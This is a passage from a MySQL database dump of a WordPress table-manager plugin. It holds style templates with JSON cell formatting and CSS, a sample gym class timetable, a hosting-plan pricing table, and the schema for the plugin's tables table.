\"cell_padding_left\":\"20\"   }      ],      \"6!2\":[     6,   2,   {  \"cell_background_color\":\"#F7F7F7\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"7!2\":[     7,   2,   {  \"cell_background_color\":\"#f7f7f7\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_bold\":true,      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\"   }      ],      \"8!2\":[     8,   2,   {  \"cell_type\":\"html\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"9!2\":[     9,   2,   {  \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"10!2\":[     10,   2,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"11!2\":[     11,   2,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"12!2\":[     12,   2,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_type\":\"html\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ],      \"13!2\":[     13,   2,   {  \"cell_padding_top\":\"10\",      \"cell_padding_right\":\"20\",      \"cell_padding_bottom\":\"10\",      \"cell_padding_left\":\"20\",      \"cell_border_right\":\"0px solid #ffffff\",      \"cell_background_color\":\"#f7f7f7\",      \"cell_border_bottom\":\"1px solid #d1d1d1\",      \"cell_font_family\":\"Arial\",      \"cell_font_size\":\"13\",      \"cell_font_color\":\"777\"   }      ]   }}','.dtr0 {    \\\\n  letter-spacing : 2px;\\\\n}\\\\n.dtr1 {    \\\\n  letter-spacing : 3px;\\\\n}\\\\n.price_wrapper {    \\\\n  position : relative;    \\\\n  .currency {  \\\\n    position: relative;  \\\\n    top: -30px;  \\\\n    left: 4px;  \\\\n    font-size: 130%;    \\\\n  }    \\\\n  .price {  \\\\n    font-size: 300%;   \\\\n  }   \\\\n  .recurrence {  \\\\n    position: relative; \\\\n    font-size: 60%;    \\\\n  }\\\\n}\\\\nspan.highlighted {    \\\\n  background-color: #57ca8e;    \\\\n  padding: 5px;   \\\\n  border-radius: 3px;    \\\\n  color: #FFF;    \\\\n  font-weight: bold;\\\\n}','sq.png',4),(5,'[[\" \",\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"],[\"Aerobics\",\"09.00 - 10.00\",\" -\",\"11.00 - 12.00\",\"-\",\"12.00 - 13.00\",\"-\"],[\"Aqua\",\"-\",\" 10.00 - 11.00\",\"-\",\"12.00 - 13.00\",\"-\",\"13.00 - 14.00\"],[\"Boxing\",\"10.00 - 11.00\",\" -\",\"11.00 - 12.00\",\"-\",\"12.00 - 13.00\",\"13.00 - 14.00\"],[\"Pilates\",\"09.00 - 10.00\",\" -\",\"-\",\"12.00 - 13.00\",\"-\",\"13.00 - 14.00\"],[\"Running\",\"-\",\" 10.00 - 11.00\",\"-\",\"12.00 - 13.00\",\"-\",\"13.00 - 14.00\"],[\"Aerobics\",\"09.00 - 10.00\",\"\",\"11.00 - 12.00\",\"\",\"12.00 - 13.00\",\"\"]]','{\"table\":{\"width\":930,\"alternate_row_even_color\":\"#000000\",\"alternate_row_odd_color\":\"#333333\"},\"rows\":{\"0\":[0,{\"height\":38,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_vertical_align\":\"middle\",\"cell_font_bold\":true}],\"1\":[1,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"2\":[2,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"3\":[3,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"4\":[4,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"5\":[5,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"6\":[6,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"7\":[7,{\"height\":34,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#adadad\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}]},\"cols\":{\"0\":[0,{\"width\":150,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_vertical_align\":\"middle\",\"cell_text_align\":\"left\"}],\"1\":[1,{\"width\":130}],\"2\":[2,{\"width\":130}],\"3\":[3,{\"width\":130}],\"4\":[4,{\"width\":130}],\"5\":[5,{\"width\":130}],\"6\":[6,{\"width\":130}]},\"cells\":{}}','','time.png',5),(6,'[[\"\",\"\",\"\",\"Pro\"],[\"\",\"\",\"Plus\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart hot\\\\\">Choose this one</a>\"],[\"\",\"Basic\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Choose this one</a>\",\"\"],[null,\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Choose this one</a>\",null,null],[\"Domain\",\"<span class=\\\\\"bold\\\\\">1</span> included\",\"<span class=\\\\\"bold\\\\\">2</span> included\",\"<span class=\\\\\"bold\\\\\">10</span> included\"],[\"IP Adress\",\"Shared\",\"Shared\",\"dedicated\"],[\"IP Failover\",\"Yes\",\"Yes\",\"Yes\"],[\"Storage\",\"<span class=\\\\\"bold\\\\\">100</span> GO\",\"<span class=\\\\\"bold\\\\\">1000</span> GO\",\"<span class=\\\\\"bold\\\\\">Unlimited</span>\"],[\"Traffic\",\"Unlimited\",\"Unlimited\",\"Unlimited\"],[\"Disk\",\"SSD\",\"SSD high speed\",\"SSD high speed\"],[\"RAID\",\"1\",\"5\",\"5\"],[\"CMS on click install\",null,null,null],[\"Joomla\",\"2.5 or 3.3\",\"2.5 or 3.3\",\"2.5 or 3.3\"],[\"Wordpress\",\"Lastest version\",\"Latest version\",\"Latest version\"],[\"Drupal\",\"Lastest version\",\"Lastest version\",\"Lastest version\"],[\"Prestashop\",\"1.5 or 1.6\",\"1.5 or 1.6\",\"1.5 or 1.6\"],[\"Magento\",\"Community edition\",\"Community edition\",\"Enterprise edition\"],[null,\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Choose this one</a>\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart\\\\\">Choose this one</a>\",\"<a href=\\\\\"#\\\\\" class=\\\\\"cart hot\\\\\">Choose this one</a>\"]]','{\"table\":{\"width\":711},\"rows\":{\"0\":[0,{\"height\":70}],\"1\":[1,{\"height\":70}],\"2\":[2,{\"height\":70}],\"3\":[3,{\"height\":70}],\"4\":[4,{\"height\":38,\"cell_background_color\":\"#135178\"}],\"5\":[5,{\"height\":27}],\"6\":[6,{\"height\":27}],\"7\":[7,{\"height\":38,\"cell_background_color\":\"#135178\"}],\"8\":[8,{\"height\":27}],\"9\":[9,{\"height\":27}],\"10\":[10,{\"height\":27}],\"11\":[11,{\"height\":38,\"cell_background_color\":\"#135178\"}],\"12\":[12,{\"height\":27}],\"13\":[13,{\"height\":27}],\"14\":[14,{\"height\":27}],\"15\":[15,{\"height\":27}],\"16\":[16,{\"height\":27}],\"17\":[17,{\"height\":60}]},\"cols\":{\"0\":[0,{\"width\":200,\"cell_background_color\":\"#ffffff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#000\",\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\"}],\"1\":[1,{\"width\":200,\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#fff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"2\":[2,{\"width\":200,\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#fff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"3\":[3,{\"width\":200,\"cell_background_color\":\"#226088\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#fff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}]},\"cells\":{\"0!1\":[0,1,{\"cell_background_color\":\"#ffffff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"1!1\":[1,1,{\"cell_background_color\":\"#ffffff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"2!1\":[2,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"20\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_font_bold\":true}],\"3!1\":[3,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_font_bold\":true,\"cell_type\":\"html\",\"cell_padding_bottom\":\"0\"}],\"4!1\":[4,1,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_type\":\"html\"}],\"5!1\":[5,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"6!1\":[6,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"7!1\":[7,1,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_type\":\"html\"}],\"8!1\":[8,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"9!1\":[9,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"0!2\":[0,2,{\"cell_background_color\":\"#ffffff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"1!2\":[1,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"20\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_font_bold\":true}],\"2!2\":[2,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_type\":\"html\"}],\"3!2\":[3,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_padding_bottom\":\"0\"}],\"4!2\":[4,2,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_type\":\"html\"}],\"5!2\":[5,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"6!2\":[6,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"7!2\":[7,2,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_type\":\"html\"}],\"8!2\":[8,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"9!2\":[9,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"0!3\":[0,3,{\"cell_background_color\":\"#226088\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"20\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\"}],\"1!3\":[1,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"#ffffff\",\"cell_type\":\"html\"}],\"2!3\":[2,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"3!3\":[3,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":true,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"\",\"cell_padding_bottom\":\"0\"}],\"4!3\":[4,3,{\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_vertical_align\":\"middle\",\"cell_type\":\"html\"}],\"5!3\":[5,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"6!3\":[6,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"7!3\":[7,3,{\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_type\":\"html\"}],\"8!3\":[8,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"9!3\":[9,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"3!0\":[3,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"15\",\"cell_font_color\":\"\",\"cell_padding_bottom\":\"0\"}],\"4!0\":[4,0,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\",\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\",\"cell_font_bold\":true}],\"0!0\":[0,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"1!0\":[1,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"2!0\":[2,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"5!0\":[5,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"top\",\"cell_padding_left\":\"20\"}],\"6!0\":[6,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"top\",\"cell_padding_left\":\"20\"}],\"7!0\":[7,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_background_color\":\"#135178\",\"cell_font_bold\":true,\"cell_border_bottom\":\"1px solid #ffffff\"}],\"8!0\":[8,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"9!0\":[9,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"10!0\":[10,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"11!0\":[11,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\",\"cell_background_color\":\"#135178\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_font_bold\":true,\"cell_border_bottom\":\"1px solid #ffffff\"}],\"10!1\":[10,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"11!1\":[11,1,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\"}],\"10!2\":[10,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"11!2\":[11,2,{\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\"}],\"10!3\":[10,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"11!3\":[11,3,{\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_background_color\":\"#135178\",\"cell_border_bottom\":\"1px solid #ffffff\"}],\"12!0\":[12,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"13!0\":[13,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"12!1\":[12,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"13!1\":[13,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"12!2\":[12,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"13!2\":[13,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"12!3\":[12,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"13!3\":[13,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"14!0\":[14,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"14!1\":[14,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"14!2\":[14,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"14!3\":[14,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"15!0\":[15,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"15!1\":[15,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"15!2\":[15,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"15!3\":[15,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"16!0\":[16,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"16!1\":[16,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"16!2\":[16,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\"}],\"16!3\":[16,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\"}],\"17!0\":[17,0,{\"cell_text_align\":\"left\",\"cell_vertical_align\":\"middle\",\"cell_padding_left\":\"20\"}],\"17!1\":[17,1,{\"cell_background_color\":\"#48b9ff\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_type\":\"html\"}],\"17!2\":[17,2,{\"cell_background_color\":\"#338ac0\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_text_align\":\"center\",\"cell_vertical_align\":\"middle\",\"cell_type\":\"html\"}],\"17!3\":[17,3,{\"cell_background_color\":\"#226088\",\"cell_text_align\":\"center\",\"cell_font_bold\":false,\"cell_vertical_align\":\"middle\",\"cell_font_family\":\"Arial\",\"cell_font_size\":\"13\",\"cell_font_color\":\"#ffffff\",\"cell_type\":\"html\"}]}}','.bold { \\\\n  font-weight : bold;\\\\n}\\\\na.cart { \\\\n  padding: 10px; \\\\n  background: #fff; \\\\n  border-radius: 5px; \\\\n  display: inline-block; \\\\n  color: #1a6390; \\\\n  text-decoration: none; \\\\n  font-weight: bold; \\\\n  &.hot {  \\\\n    background-color : #AAD450;  \\\\n    color: #FFF; }\\\\n}','vim.png',6);
/*!40000 ALTER TABLE `wp_wptm_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wptm_tables`
--

DROP TABLE IF EXISTS `wp_wptm_tables`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wptm_tables` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_category` int(11) NOT NULL,
  `title` varchar(100) NOT NULL,
  `datas` mediumtext NOT NULL,
  `style` mediumtext NOT NULL,
  `css` text NOT NULL,
  `hash` varchar(32) NOT NULL,
  `params` text NOT NULL,
  `created_time` datetime NOT NULL,
  `modified_time` datetime NOT NULL,
  `author` int(11) NOT NULL,
  `position` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_category` (`id_category`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wptm_tables`
--

LOCK TABLES `wp_wptm_tables` WRITE;
/*!40000 ALTER TABLE `wp_wptm_tables` DISABLE KEYS */;
